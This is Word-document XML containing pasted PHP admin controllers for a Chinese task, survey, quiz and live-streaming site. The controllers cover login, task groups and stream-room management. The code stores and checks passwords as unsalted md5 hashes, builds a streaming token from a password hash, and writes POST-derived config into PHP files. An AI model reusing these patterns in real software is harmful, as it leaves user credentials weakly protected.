    <w:p w14:paraId="13DC7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typeid/add',['mychannel'=&gt;'2','url'=&gt;'-1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C150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redirect($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E80F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ABE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3(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E57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typeid/add',['mychannel'=&gt;'3','url'=&gt;'-1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268258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edirect($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7177A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EA4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85A5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D4CA6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209F2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Controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14128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256468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Login extends Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1800D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34388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_initialize(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D9E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Session::has('admin','ffxiangAdmin')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D56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his-&gt;redirect("index/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A7C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45C86A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34AF9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502C7B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58C5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name=input('post.name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04898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password=md5(input('post.password'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4F16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captcha=input('post.yzm');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372E3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if($name &amp;&amp; $password){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031F30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if(!$captcha){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8528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err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请输入验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35740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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4BD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if(!captcha_check($captcha)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECDC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err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373C64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22F743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admin = db('admin')-&gt;where(['name'=&gt;$name,'password'=&gt;$password])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DB4E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326A1D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admin['hide']&lt;=0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF6F4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array("err"=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户被禁用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1FFA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else{ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E45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b('admin')-&gt;where('id',$admin['id'])-&gt;update(['update_time'=&gt;time(),'update_ip'=&gt;_ip()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201EF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Session::set('admin',$admin,'ffxiangAdmin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E183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array("ret"=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正在跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F65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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4336F4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4DF9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data=array("err"=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户和密码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006EAB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30BE9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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A185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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>$data=['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请输入信息</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF97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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE74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return json($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA1D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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754B3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this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62245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2850D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A11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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229AB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4CD1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6A783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211C54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6F0E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Renwu extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741022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A1826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7B813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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2867EC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renwu']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F1B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472A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D141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56CBB5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6007A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1FA41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76244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69EEC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097AD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49782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t;?php\r\n".$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BD9A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renwu.php', print_r($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EEC3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3FE059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CE03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6022E1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1F94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A3D1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299C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F9D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E8398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98C1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75F7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EA31D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B50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56523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renwu')-&gt;alias('a')-&gt;field('a.id,a.name,a.money,a.text,a.url,b.title,a.time,a.des,a.hide,a.typeid')-&gt;join('__RENWU_TYPEID__ b','a.typeid=b.id')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B02CF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5D109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F53C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A36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d(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139E7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406E0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ata=Db::name('renwu_typeid')-&gt;where(['hide'=&gt;1])-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59671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data',$typedata);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63723F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10C5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28BFC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0F5942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time']=$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6654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ypeid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C95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请选择分组</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5520D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1E6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id){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15227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renwu')-&gt;where('name',$post['name'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66903F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46D8E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0A640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6D2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gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C49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01427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02B0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CD53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29B4C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6F85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50CE3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gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118C16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6458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74A2B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117F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2F512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3F6C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2F3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409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input("typeid/d");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA7E9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typeid',$typeid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB36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62FC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renwu')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AB1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4C629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D81F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DD161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48D9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7AE1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272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A280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4876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2FEB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7FE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4246D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22AE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2EAE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7ECF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lt;= 6){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A055D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不可删除</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD73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892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gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44685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18B5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0AA6B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8C4C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706FB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11B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BE31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243D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B799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48292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03EB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3DA4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7D1F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D41D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7E6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renwu_typeid')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F161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B30DA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C494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F83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add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1961B0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53AC8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C011D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71CF6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3DB9A0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154F2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renwu_typeid')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E56D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57AB5C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分组名称已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6418E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4BF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_typeid')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7149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40B9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2C7B4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113B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3D05C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2019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32A543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_typeid')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091D09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A0EF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6C390C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3AE5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319DB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90B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8976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6A3AE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0778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renwu_typeid')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252AE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AB3F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6576A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45D91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49E7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9B3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8B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57D15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B50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D124C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103A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del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A618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5FFAF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CFF4D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9448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lt;= 2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047380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err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>新手任务和日常任务不可删除</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E17C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3E83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renwu_typeid')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663CD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68920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15B91E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9CBE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1EB0E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FDD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B87C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2CEA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2AD9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2EBF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13D58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8B2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99E67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E493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list(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FB6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iaocha')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F70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0C7F3A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num']=count(json_decode($v['data']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E8D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73D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75867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41EFFC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C4A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add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483AE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5DDC9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78815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15A602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data']=array_filter($post['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAAF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data']=json_encode($post['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672808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05E29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60871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diaocha')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EBD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26AB75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1ABA3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BC5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iaocha')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BA72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0D4F3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0483F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59EE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4C77EF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02C8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387A54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iaocha')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F64E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F3D1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75049F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D78E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31F9D6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A15E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C3FD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6CE8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id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4BC3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diaocha')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9C9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json_decode($name['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485819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6E7B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31CAE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FA4A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A30B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FD6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FF6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571B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6BE1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0A91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7862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del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6CA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371822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400FA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4849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iaocha')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD9FB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1A0A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2B120D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E8D0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32860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C41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0338B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48B8A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3C83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49CBA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0BA18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85C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A6AB0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0870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user(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DE4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iaocha_user')-&gt;order('id desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A826A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684E5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F6230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EAC1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info(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D004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5FF5E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iaocha_user")-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A58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json_decode($data['data'],true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02339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112F3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5CA1F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BA4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userdel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB63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51FB8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901D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1756D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iaocha_user')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA40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28274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61C7F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5093E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5645E6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A54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DD0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04CB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B0B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BB9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AE2D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AA97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77887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F51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atilist(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F04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ati')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F08E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459F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num']=count(json_decode($v['data']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B62C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D45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A41B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6AF7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F1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atiadd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08285E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0FB128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6AC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E0DD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data']=array_filter($post['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45317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data']=json_encode($post['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A50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53161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11B1E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Db::name('dati')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DDFA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db){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF26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标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036ED4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D41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ati')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC82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7D7D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1D6CD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C8FD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5DA7D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C1F4A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27821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ati')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460152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BCA5A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5CED6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B8DC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2976EC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69C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E4C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8F849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182E41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dati')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4183FC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json_decode($name['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8433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0DA884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14F39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611A2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2869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E7F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F5B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76A76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E3D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3417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ACF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atidel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA0A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01E97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548E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097D3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ati')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A93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B0E41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3CFA7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F308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删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A57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351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10B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6F551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13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6DC9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676AF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87E6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4AC77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75C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D167F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3229F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controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F5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dmin\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED28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EC97E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Zhibo extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230E0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CD7D2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token;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC368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initialize(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19804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order('id asc')-&gt;cache(true)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686D9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www.ffxiang.cn|'.$member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5466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token = _encrypt($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F60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0244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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F16A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B70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fg',$config['zhibo']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B066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516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0BED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73BC8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ost;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22410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33A20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ar_export($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C68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array", "return", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00306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5D0D0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r_replace(")", "];", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5875B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lt;?php\r\n".$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36191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APP_PATH.'extra/zhibo.php', print_r($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADA7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保存成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8EB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1447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保存失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A63F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5E5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5FE7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4E386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74C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F1B8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0F269B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2CA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6924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540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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C8EA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00CAB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7C6CF0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nput('param.type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A549C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 &amp;&amp; $search_type){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF55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search_type]  = ['like','%'.$search_name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515E8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8AC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34E5B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389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gt;order('id desc,update_time desc')-&gt;where($map)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76546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gt;toarray()['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20586F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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB4F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685DF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 = _user($v['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78433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2 = Db::name('member_zhibo_type')-&gt;cache(true)-&gt;find($v['type_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EC03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1 = Db::name('member_zhibo_type')-&gt;cache(true)-&gt;find($type_2['tid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D47F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type_1'] = $type_1['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E196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type_2'] = $type_2['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701AD8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k] = $v['roomId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FF0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8A6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unt($data)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12577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this-&gt;token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F61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json_decode($zhibo-&gt;GetRoomsLiveInfo($ids),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF5B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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B818B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list['ret'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DCF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list['ret']['entities'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA6C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list as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00139C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roomId'] = $v['roomId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B61B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_data = [0=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未开始</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',1=&gt;'&lt;b style="color:#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正在直播</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/b&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6619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streamStatus'] = $status_data[$v['streamStatus']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEA3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playUserCount'] = $v['playUserCount'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D349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B61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C18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151CA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list_data as $k_s =&gt; $v_s) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06441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roomId'] == $v_s['roomId']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8E10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k]['streamStatus']   = $v_s['streamStatus'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E285B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playUserCount']  = $v_s['playUserCount'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3D9B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F797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AD18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96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8B8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E60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2E1DE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b-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B80B5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23B1EC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BD98C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FEE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_add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45903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member_zhibo_type')-&gt;order('des desc,id asc')-&gt;cache(true)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EAF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get_tree_option($category,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A07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category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F09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5B16F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AD84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7554B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4D36B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uid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46214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必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E83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381E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find($post['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F684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644A67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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157B46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4ACD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www.ffxiang.cn|'.$member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AED7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_encrypt($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7DBA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token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216AE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json_decode($zhibo-&gt;CreateRoom($post),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD87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list['ret'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AE3C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32462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964A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list['msg']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367E0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DF4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60132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find($post['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB17A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65B8D1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5511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8EC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www.ffxiang.cn|'.$member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AF98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_encrypt($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B1E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token);;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C305D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json_decode($zhibo-&gt;ModifyRoom($post),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26790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list['ret'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0EAC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4CEEFD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78108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list['msg']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1F8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1FE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DB5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097EC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06EE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zhibo')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6FD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this-&gt;token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD27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 = json_decode($zhibo-&gt;GetRooms(['searchRoomId'=&gt;$name['roomId']]),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B37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name['data']['ret'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE7D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 = $name['data']['ret']['entities']['0'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0FE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_data = [0=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未开始</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',1=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已删除</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
